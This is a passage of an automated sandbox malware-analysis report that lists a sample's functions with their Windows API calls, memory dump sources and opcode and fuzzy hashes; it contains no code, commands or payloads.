Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2b9bf8f93eddba59b05a6a829bc65b40f5e2cc8dd0454a75e151dfa1d687b677
Instruction ID: b9f6e69f6ee2d233c52f29172ec980d6ff0bd841a575121203ba4c3abe21ff4c
Opcode Fuzzy Hash: 2b9bf8f93eddba59b05a6a829bc65b40f5e2cc8dd0454a75e151dfa1d687b677
Instruction Fuzzy Hash: CCE0EDB26002086BD620DF99CC40EE737ACAF44760F018254FE1C9B381C530E9408BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A652 Relevance: 1.5, APIs: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1a88053897881c3b828ccecd3321ef29399b306a464667d37a72ee4e810d1203
Instruction ID: ff17b7a846088bdd27e4276fcf15dd02f3cae24546da19d763bd9d7f74a90aab
Opcode Fuzzy Hash: 1a88053897881c3b828ccecd3321ef29399b306a464667d37a72ee4e810d1203
Instruction Fuzzy Hash: 8CE06DB1240204AFDB18DFA5CC85EEB7B6CEF89324F048559FD1C9B251C631E815CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5

Uniqueness

Uniqueness Score: -1.00%

Function 01602C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01602C24

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5d29ccc847e62f1fde696a3df2776e3df3ca36f46131630708a32b28ef3cba2
Instruction ID: ffae6d14378fd1c2e6e9be507986daf71ac3c150b3499fcca4e34bbef54edc59
Opcode Fuzzy Hash: c5d29ccc847e62f1fde696a3df2776e3df3ca36f46131630708a32b28ef3cba2
Instruction Fuzzy Hash: 49B09B729415C5C6DA56E7644E0C71779047BD1701F19C065D2030795F8738C1D1E275

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001C460F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,FFFFFFFF,000000FF), ref: 001BB422

GetACP.KERNEL32(?,?,?,?,?,?,001B96C1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001C46CE
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001B96C1,?,?,?,00000055,?,-00000050,?,?), ref: 001C4705
_wcschr.LIBVCRUNTIME ref: 001C4799
_wcschr.LIBVCRUNTIME ref: 001C47A7
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001C4868

Strings

utf8, xrefs: 001C47D7

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 0484e0acc7b968ae55a25f447ddf8d8c28a13375b284a2c6fd98ab7be32f7327
Instruction ID: 3ca7cc7612a48fa441ff2a2edc9f9ba9b83d50b93bb95deff0bdf729e83ae363
Opcode Fuzzy Hash: 0484e0acc7b968ae55a25f447ddf8d8c28a13375b284a2c6fd98ab7be32f7327
Instruction Fuzzy Hash: 13712671A08316ABEB24AB74DC96FBA77A8EF36700F10002EF905D7581EB70E8408765

Uniqueness

Uniqueness Score: -1.00%

Function 001C4DA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,001C50BA,00000002,00000000,?,?,?,001C50BA,?,00000000), ref: 001C4E41
GetLocaleInfoW.KERNEL32(?,20001004,001C50BA,00000002,00000000,?,?,?,001C50BA,?,00000000), ref: 001C4E6A
GetACP.KERNEL32(?,?,001C50BA,?,00000000), ref: 001C4E7F

Strings

OCP, xrefs: 001C4DFC
ACP, xrefs: 001C4DC6

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 929e0652f73ebd67f3914d6491f44782e13b1cb4cc8c650e8a4ba87d22aa2cb7
Instruction ID: 372c589dae2ca2b249808fadc79c536c7dc7af20cb88cb604923d92b30488d34
Opcode Fuzzy Hash: 929e0652f73ebd67f3914d6491f44782e13b1cb4cc8c650e8a4ba87d22aa2cb7
Instruction Fuzzy Hash: 8021A132608100ABEB359F95C910FA773AABF74B64B57852CE90AD7100F736DD40C350

Uniqueness

Uniqueness Score: -1.00%

Function 001C4F84 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,FFFFFFFF,000000FF), ref: 001BB422

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001C508C
IsValidCodePage.KERNEL32(00000000), ref: 001C50CA
IsValidLocale.KERNEL32(?,00000001), ref: 001C50DD
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001C5125
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001C5140

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 7d5bda936a99aa52d79e580cf21fcd2ec8b0bf15d24a6d36dfafdcf4801ac31c
Instruction ID: 3457eff7ff3d6594573aa57ba62f1ba06467932f9225949b564e12e7be191145
Opcode Fuzzy Hash: 7d5bda936a99aa52d79e580cf21fcd2ec8b0bf15d24a6d36dfafdcf4801ac31c
Instruction Fuzzy Hash: 81516C71A04609ABDB10DBA5CC85FAF77B9FF28700F58046DF901E7191DB70E9948BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00417D98 Relevance: 4.1, Strings: 3, Instructions: 320COMMON

Download Yara Rule

Strings

=, xrefs: 00417E6E
www., xrefs: 00417F36, 00417F39
www., xrefs: 00417E9E, 00417F5F, 00418014, 00418047, 004180A4, 004180CF, 0041812C

Memory Dump Source

Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd

Yara matches

Similarity

API ID:
String ID: =$www.$www.
API String ID: 0-3343787489
Opcode ID: c077a1bc44d6a1329e9727fde2ee99480905231e16689b545328ce5d56835e8b
Instruction ID: 5976124a9dc59a014d9d68687fa376a8a23cf36b6abafeb928ef0a733691ca1b
Opcode Fuzzy Hash: c077a1bc44d6a1329e9727fde2ee99480905231e16689b545328ce5d56835e8b
Instruction Fuzzy Hash: 34C1D7B1940308AADB14DBF0CCC1FEF777DAF44708F40455EB2595B182DA79A684CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 01604340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 795033158feafd5bb551028d442398c6d5f51e3c91affe4be5a042f5a03a683f
Instruction ID: 43352cb06590b6197c795f03bb1025e23323fe1085459a684a18171f4860b4a0
Opcode Fuzzy Hash: 795033158feafd5bb551028d442398c6d5f51e3c91affe4be5a042f5a03a683f
Instruction Fuzzy Hash: 6690023264580013914075584C845475009A7E1301B59C011E4424654DCB148A565361

Uniqueness

Uniqueness Score: -1.00%

Function 01604650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4fe7ea89e801952effa1f568acf7935cc2dfb0bf85438b976596d10208a35d7
Instruction ID: 18703bcaf1b89313a41da8e41fb93610350b2a0379d785365adbaa11b4e54144
Opcode Fuzzy Hash: c4fe7ea89e801952effa1f568acf7935cc2dfb0bf85438b976596d10208a35d7
Instruction Fuzzy Hash: 4190026264150043414075584C044077009A7E2301399C115A4554660DC71889559369

Uniqueness

Uniqueness Score: -1.00%

Function 01602BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90b03f5e343881cb97d41d00dae5f81c154732b2b0d672008dc8c81c7bd8b91
Instruction ID: b1c75b7f68c6f863c42d894078da42f817f384b16653ae50bf209671c4d934dc
Opcode Fuzzy Hash: d90b03f5e343881cb97d41d00dae5f81c154732b2b0d672008dc8c81c7bd8b91
Instruction Fuzzy Hash: 8190023224544843D14075584804A47101997D1305F59C011A4064794ED7258E55B761

Uniqueness

Uniqueness Score: -1.00%

Function 01602BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a36f6104f21b1d22927b2b3dda07a6d8891d7bb3aa5b7632dd77f00406f0ac0
Instruction ID: 72e71c0d6aca83e5236561fc3865eae6f045c6d16cecbbd54f5f24cd9b1e097a
Opcode Fuzzy Hash: 5a36f6104f21b1d22927b2b3dda07a6d8891d7bb3aa5b7632dd77f00406f0ac0
Instruction Fuzzy Hash: 3A90023264540803D15075584814747100997D1301F59C011A4024754EC7558B5577A1

Uniqueness

Uniqueness Score: -1.00%

Function 01602B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a58f1748631f70e27cda54d5a28f48e9ba3246abdf3996852f848621f8e98fa
Instruction ID: d20f31d17cb7ae1ced29001caa4d72d5f0bec450f48d4db76c7f426f6f6f9825
Opcode Fuzzy Hash: 6a58f1748631f70e27cda54d5a28f48e9ba3246abdf3996852f848621f8e98fa
Instruction Fuzzy Hash: 5F90023224140803D10475584C04687100997D1301F59C011AA024755FD76589917231

Uniqueness

Uniqueness Score: -1.00%

Function 01602AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f87872fc6683a36d521c8efa6439a347c7e1e37901f3cac7c3ac7dce261828
Instruction ID: 1336a73802e8374770f750261a9508be62137e96eba39bfad5fa69d9aacecb07
Opcode Fuzzy Hash: 89f87872fc6683a36d521c8efa6439a347c7e1e37901f3cac7c3ac7dce261828
Instruction Fuzzy Hash: C4900226261400030145B9580A0450B1449A7D7351399C015F5416690DC72189655321

Uniqueness

Uniqueness Score: -1.00%

Function 01602AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f34aed9e6f46176822606ff4006acedc227d523745cd208c2cec5344e083658
Instruction ID: 7a184f935994be281880d7bf9e09d9569f549a2ac49bbb88a2952a0bb5f75529
Opcode Fuzzy Hash: 1f34aed9e6f46176822606ff4006acedc227d523745cd208c2cec5344e083658
Instruction Fuzzy Hash: 389002A2241540934500B6588804B0B550997E1201B59C016E5054660DC62589519235

Uniqueness

Uniqueness Score: -1.00%

Function 01602D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f3c132ee395b5e18f613850a73c8f9262955bb54bf3c727d11ce2a8f3b3536
Instruction ID: 148fe9e8e3a0f531a8a957cf7fab785e235b46e8e33e4508e0632fff5d6c20b7
Opcode Fuzzy Hash: 73f3c132ee395b5e18f613850a73c8f9262955bb54bf3c727d11ce2a8f3b3536
Instruction Fuzzy Hash: CE90022224544443D10079585808A07100997D1205F59D011A5064695EC7358951A231

Uniqueness

Uniqueness Score: -1.00%

Function 01602DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d57df7938afe1875a85c93ad3460925a241c40b41b6941e7e1f59fd9558a99dd
Instruction ID: f13849e3b431b0f1928a2f2d7f7a62695a5e77f5c000d4b687f0ce9b54bfd6d7
Opcode Fuzzy Hash: d57df7938afe1875a85c93ad3460925a241c40b41b6941e7e1f59fd9558a99dd
Instruction Fuzzy Hash: 0990023228140403D14175584804607100DA7D1241F99C012A4424654FC7558B56AB61

Uniqueness

Uniqueness Score: -1.00%

Function 01602C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a8ada56f275121f0a60f40b066a6d1a51f2f4fb22044cb6a5e1206413c855a
Instruction ID: 6e13fbaf6c6a2d8eefad81c909210b1b6c5d7ab335da140179bd81b36833a1db
Opcode Fuzzy Hash: 61a8ada56f275121f0a60f40b066a6d1a51f2f4fb22044cb6a5e1206413c855a
Instruction Fuzzy Hash: 1490023224140843D10075584804B47100997E1301F59C016A4124754EC715C9517621

Uniqueness

Uniqueness Score: -1.00%

Function 01602CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b14ac2b46001d84eceeb3f17fd5c2955f4a9eaec1f546f38b6fbe3db00c5d735
Instruction ID: a7ff4523255e7786eaaa4014b977583ff6300c5b41c38de0955e6fdd22d1e5f7
Opcode Fuzzy Hash: b14ac2b46001d84eceeb3f17fd5c2955f4a9eaec1f546f38b6fbe3db00c5d735
Instruction Fuzzy Hash: B090023224140403D10075585908707100997D1201F59D411A4424658ED75689516221

Uniqueness

Uniqueness Score: -1.00%

Function 01602CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c680581a50df308caecaa8d58235485850d31b506d9998425d68a7dfa3487e84
Instruction ID: d204169d6544bd907ae46a7226a13cd70d4130c6e128aa759cb86b23a1bcf16e
Opcode Fuzzy Hash: c680581a50df308caecaa8d58235485850d31b506d9998425d68a7dfa3487e84
Instruction Fuzzy Hash: 4390022264540403D14075585818707101997D1201F59D011A4024654EC7598B5567A1

Uniqueness

Uniqueness Score: -1.00%

Function 01602F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 756cc43115f945e1dda9b2d20ae1725d57b716ad93381937486fc716ad8e9931
Instruction ID: f776b7874ce40c909789aceb0c35ee7ee2abc5a2803d2eca7e3dce20380c3eab
Opcode Fuzzy Hash: 756cc43115f945e1dda9b2d20ae1725d57b716ad93381937486fc716ad8e9931
Instruction Fuzzy Hash: 6F90026225140043D10475584804707104997E2201F59C012A6154654DC6298D615225

Uniqueness

Uniqueness Score: -1.00%

Function 01602FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b5d36fcea1fdc34006c6b14e8631b913dc7adb58d00d8a847b8c6d7d4f733da
Instruction ID: d0e85feda686efa625b23462537074722a085398efc58fc6f5a5ca64b69e6c23
Opcode Fuzzy Hash: 5b5d36fcea1fdc34006c6b14e8631b913dc7adb58d00d8a847b8c6d7d4f733da
Instruction Fuzzy Hash: 9B90023224180403D10075584C08747100997D1302F59C011A9164655FC765C9916631

Uniqueness

Uniqueness Score: -1.00%

Function 01602E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a748b47f06dcf9bf32a1324d90614500ed62acd62bea3566e96a6bb26818a189
Instruction ID: 6bba7170a3013650abc14e1ee03a45ed09adf7096cbaf8f12ccc7fc1cbaf7677
Opcode Fuzzy Hash: a748b47f06dcf9bf32a1324d90614500ed62acd62bea3566e96a6bb26818a189
Instruction Fuzzy Hash: D690022234140403D10275584814607100DD7D2345F99C012E5424655EC7258A53A232

Uniqueness

Uniqueness Score: -1.00%

Function 01602EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57f52bcf53493c53e2e84c1f1b7f7d0bd4c3a0d3c979e939646b634b4b9d2b4f
Instruction ID: ae57f9401979242b2d63bfdba29f682d11e599700eee161964e35a1716e6ca40
Opcode Fuzzy Hash: 57f52bcf53493c53e2e84c1f1b7f7d0bd4c3a0d3c979e939646b634b4b9d2b4f
Instruction Fuzzy Hash: C890026224180403D14079584C04607100997D1302F59C011A6064655FCB298D516235

Uniqueness

Uniqueness Score: -1.00%

Function 01603010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 281e470baecee765fcc52f6668c2c4bd419e6108638e5dfdad716b79c0408766
Instruction ID: 149ae156d05f7d8ff45826c317c18315a955f4f1fe07a40ed724343235ca7f69
Opcode Fuzzy Hash: 281e470baecee765fcc52f6668c2c4bd419e6108638e5dfdad716b79c0408766
Instruction Fuzzy Hash: 1890022224184443D14076584C04B0F510997E2202F99C019A8156654DCA1589555721

Uniqueness

Uniqueness Score: -1.00%

Function 01603090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8eb68987f76c1db087c8ef8d20832f280e2a7e978898b34639eee9ebbc23362
Instruction ID: 26be3f3b836d4d14111a0d638b9dcf524480151103e6efac59e2b8e8daf563ca
Opcode Fuzzy Hash: e8eb68987f76c1db087c8ef8d20832f280e2a7e978898b34639eee9ebbc23362
Instruction Fuzzy Hash: 8F90022228140803D14075588814707100AD7D1601F59C011A4024654EC7168A6567B1

Uniqueness

Uniqueness Score: -1.00%

Function 016035C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e826d21c76f451d70591cd93e344570f240ba4743670df1f3ad18253ac38f3e2
Instruction ID: b0ba4fc30de026a9db0b7f761c5e6f020c023be6ae16de66b35ce6b7d25f6a5d
Opcode Fuzzy Hash: e826d21c76f451d70591cd93e344570f240ba4743670df1f3ad18253ac38f3e2
Instruction Fuzzy Hash: 0B90023264550403D10075584914707200997D1201F69C411A4424668EC7958A5166A2

Uniqueness

Uniqueness Score: -1.00%

Function 016039B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbe2b667a808b952923adde92d8351347045006a09bff7bd29e3d05dfddf7e2d
Instruction ID: 6af500020fcc3ef20c88e21ee43ceeda0db62908f732ad38ccb93a9ed87e78f8
Opcode Fuzzy Hash: bbe2b667a808b952923adde92d8351347045006a09bff7bd29e3d05dfddf7e2d
Instruction Fuzzy Hash: EB90022228545103D150755C48046175009B7E1201F59C021A4814694EC65589556321

Uniqueness

Uniqueness Score: -1.00%

Function 01603D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

